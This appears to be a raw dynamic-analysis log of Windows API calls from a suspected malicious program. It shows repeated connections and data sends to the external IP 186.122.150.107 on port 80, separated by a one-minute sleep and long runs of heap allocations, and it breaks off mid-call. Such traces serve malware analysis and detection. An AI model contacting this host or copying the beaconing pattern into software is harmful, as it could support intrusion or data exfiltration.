[0186.328] htons (hostshort=0x50) returned 0x5000 [0186.328] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0186.328] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0186.329] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0186.329] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0186.330] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0186.330] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0186.585] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0186.585] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0186.848] closesocket (s=0x2bc) returned 0 [0186.849] WSACleanup () returned 0 [0186.849] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2311f68 [0186.849] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x230fac0 [0186.849] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2311278 [0186.849] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x230f670 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x230f898 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2310c00 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2310138 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x230edd0 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x230e308 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x230deb8 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x23118f0 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x230e0e0 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2310360 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x23114a0 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2310588 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x23107b0 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2311d40 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x23109d8 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x230e530 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x230e758 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x230eba8 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2316240 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2314a88 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2316468 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2313720 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x23130a8 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2315328 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2315778 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x23134f8 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2315bc8 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2340270 [0186.850] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2340888 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2341ee0 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x23422f0 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x233f848 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x233ee20 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2340c98 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x233f640 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x23424f8 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x233f028 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2340478 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x23414b8 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2342d18 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x233fc58 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x233f230 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2340a90 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234de60 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234c8b8 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234af20 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234b700 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234e640 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234d878 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234b508 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234b310 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234c2d0 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234b8f8 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234baf0 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234c4c8 [0186.851] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234ad28 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234da70 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234e838 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234dc68 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x23506f8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x23508e0 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x234f3e8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2350328 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2350ac8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2351dd8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2351638 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2351450 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x234fb88 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x234f7b8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2350140 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2351268 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x234ee30 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x23521a8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2350510 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x234f5d0 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231c9a8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231a4c8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231cb80 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231a118 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231aa50 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231a6a0 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231a878 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231d4b8 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x231d690 [0186.852] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2572e90 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2570600 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2570428 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x25737c8 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2572908 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x25712e8 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2573068 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2320d68 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231f640 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231ed58 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231f9d0 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231fb98 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231fd60 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x23210f8 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231df18 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231e0e0 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x231e470 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2321650 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x23212c0 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2321488 [0186.854] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x236ab08 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x236acd0 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x236b060 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2355408 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2352ff0 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2356380 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x23561c8 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2354648 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x23531a8 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2353f68 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2353db0 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x23549b8 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2354b70 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2353360 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2354d28 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2356010 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2355930 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2353888 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2353a40 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22f7738 [0186.855] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22f7a88 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22f7dd8 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22f87c8 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x257bc20 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x257b580 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x257b728 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x257b8d0 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x257ba78 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x257bdc8 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2579ff8 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2578a70 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25792b8 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2578578 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2578720 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2578dc0 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2323810 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2322688 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2324338 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x23244d0 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2322358 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2324668 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2324800 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x23224f0 [0186.856] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2322820 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2322ce8 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2324ff8 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2325190 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2325328 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x23254c0 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2324cc8 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2325658 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2327560 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x23270c8 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2327250 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x23273d8 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x23279f8 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2327d08 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2327e90 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2328018 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x23281a0 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x23284b0 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2328638 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x23287c0 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2328948 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x23290f0 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2329400 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2329588 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x235abf0 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2359d40 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x235a900 [0186.857] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2359eb8 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2359760 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2357b78 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2359bc8 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x23582d0 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2357598 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2358e90 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x23585c0 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x23592f8 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2358158 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2357420 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2359008 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2359180 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fcd78 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fcaa8 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fd480 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fcee0 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fd750 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fd048 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257eab8 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257c8f8 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257ec20 [0186.858] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257c358 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257d9d8 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257c628 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257c4c0 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257c790 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257db40 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257ca60 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232a8a0 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232ba18 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2329b30 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2329f38 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232b768 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2329de0 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232a5f0 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232b610 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232b0b0 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232a9f8 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232bf78 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232b8c0 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232bcc8 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232a090 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232a1e8 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x232be20 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232fa10 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232df28 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232e070 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232ee88 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232f260 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232e6d8 [0186.859] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232ed40 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232fde8 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232eab0 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232efd0 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232f8c8 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232f118 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232f3a8 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x232ff30 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2330d48 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2330e90 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22da498 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22dabe8 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2581a28 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2582658 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2581dd0 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2580090 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x25812d8 [0186.860] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2581f08 [0186.861] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2582040 [0186.861] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2581068 [0186.861] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2581c98 [0186.868] Sleep (dwMilliseconds=0xea60) [0196.882] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0196.882] socket (af=2, type=1, protocol=6) returned 0x2bc [0196.885] htons (hostshort=0x50) returned 0x5000 [0196.885] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0196.885] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0196.887] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0196.887] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0196.887] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0196.887] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0197.149] send (s=0x2bc, 